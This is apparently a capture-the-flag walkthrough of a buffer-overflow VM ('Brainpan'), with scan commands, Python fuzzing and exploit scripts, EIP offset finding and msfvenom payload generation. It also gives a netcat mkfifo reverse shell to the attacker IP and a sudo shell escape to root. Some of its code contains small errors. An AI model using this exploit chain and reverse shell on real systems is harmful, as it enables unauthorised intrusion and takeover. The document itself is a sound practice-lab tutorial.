Kategorie
Bez kategorii

OSCP-like Buffer Overflow

1.Initial Scan

Following is the outcome of my hacking handiwork and obtaining root. Withour further delay, let’s start the party.

nmap -sV -sT -v -p- -T4 192.168.56.1/24
  • custom application running in Wine on port 9999
  • python SimpleHTTPServer on port 10000

Nikto might be helpful at this moment

nikto -h 192.168.56.106

It tells us about the mysterious bin directory. Let’s browse the website and look inside it:

192.168.56.106:10000/bin/

A suspicious app binary is waiting there for us – maybe it’s the key for solving this puzzle?

We won’t know unless we check it out. Let’s run the strings command to view the hardcoded strings within the binary

The shitstorm line instantly draws the attention – it may be a password to a certain service! We are gonna give it a try:

It looks useless. I also used telnet but still nothing, the application responded with the following: Connection closed by foreign host.

The app behaves as if it were a kind of a server. After opening the socket it waits for connection, checks the input and then drops.

2. Some scripting & fuzzing

Preinstalled Immunity Debugger on Windows 32-bit VM may come in handy here.

In the first round we’re gonna send a long, repeated string of A’s with a simple fuzzer visible below. By running the script, the terminal will tell us whether providing sufficiently long input can crash the app:

import socket

for i in range(30):
  s = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
  s.connect(("192.168.56.105",9999) # mind to change the IP address :-)
  payloaod = int(i)*("A"*100)
  s.send(payload+"\r\n")
  print "[*] Sending buffer data with " + str(len(str(payload))) + " A's\r\n"
  s.close()

Running the code provides us with the following output:

Turns out that the overflow occurs around the length of 900 A’s.

In Immunity we notice that the EIP has been overwritten with 41414141 (ASCII representation of four A’s). It also says that an Access violation occurs while executing the code at address 41414141.

3. Finding EIP location

As the vulnerability is known and it’s obvious that we’ve gained control over replacing the EIP address, it brings us closer to our goal.

Firstly, we need to find the offset that could control the EIP. We’re gonna utilize a Metasploit feature and create a pattern consisting of a set of unique, three-character substrings:

It spits out a unique and random set that perfectly fits to our payload.

import socket

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.56.105',9999))

payload = ("Put the pattern here")

print s.recv(1024)
s.send(payload)
print s.recv(1024)

s.close()

Execution of the script causes Access violation again and leads to crash:

As you can see above, the pattern inside the EIP is 35724134

After having the pattern located inside the instruction pointer (EIP), let’s determine the offset (known as the exact location of the address) and make it point to our malicious shellcode, which we will craft later on.

ruby pattern_offset.rb -q 35724134

Exactly 524 bytes of junk data is needed to get us to the EIP.

Now our payload will look like this: "A"*524+"B"*4+"C"*(900-524-4)

import socket

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.56.105',9999))

payload = "A"*524 + "B"*4 + "C"*(900-524-4)

print s.recv(1024)
s.send(payload+"\r\n")
print s.recv(1024)

s.close()

After executing this script the EIP gets overwritten with 42424242 (the ASCII code of „B” is 0x42)

Setting JMP ESP address

!mona jump -r ESP

Quick glance and we see something helpful:

0x31170000<- module with no SafeSEH and ASLR protection

And we find the JMP ESP address

4. Shellcode payload and reverse shell

  • Brainpan’s IP – 192.168.56.106
  • Attacker’s IP – 192.168.56.101
  • Windows IP – 192.168.56.105
msfvenom -p windows/shell_reverse_tcp lhost=192.168.56.101 lport=4444 -f c -b "\x00"
import socket

buf = ("\xb8\xf9\...\...\...\..."
"\xc9\xb1\...\..\...\...\...\..."
"...
"...
...
"\x..\x..\x..\x..") 

payload = "A"*524 + "\xf3\x12\x17\x31" + "\x90"*16 + buf
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
  s.connect(('192.168.56.106',9999))
except:
  print "Error"
  sys.exit(0)

s.recv(1024)
s.send(payload)

It was really confusing at first. Notice the CMD 1.4.1 label? This is because the windows executable is running through Wine on a Linux machine. Time to switch to Linux shell.

msfvenom -p linux/x86/exec CMD="mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.101 4444 >/tmp/f" -b "\x00" -f py

…and swap the shellcode in our python script after setting up the netcat once again.

5. Privilege escalation

Good, we’re back in the game! Spawning a tty shell -> check id -> list the directory ls -la -> cat checksrv.sh -> and check the local users

cat group

cat passwd -> ls -> cd /opt -> cd /etc

ls -la sudoers

sudo /home/anansi/bin/anasi_util

sudo /home/anansi/bin/anasi_util manual /etc/sudoers

!/bin/bash And finally!

Conclusion

It is a great opportunity to improve:

  • understanding of buffer overflow,
  • scripting skills,
  • fundamentals of Immunity Debugger,

Hope it was useful 🙂

Dodaj komentarz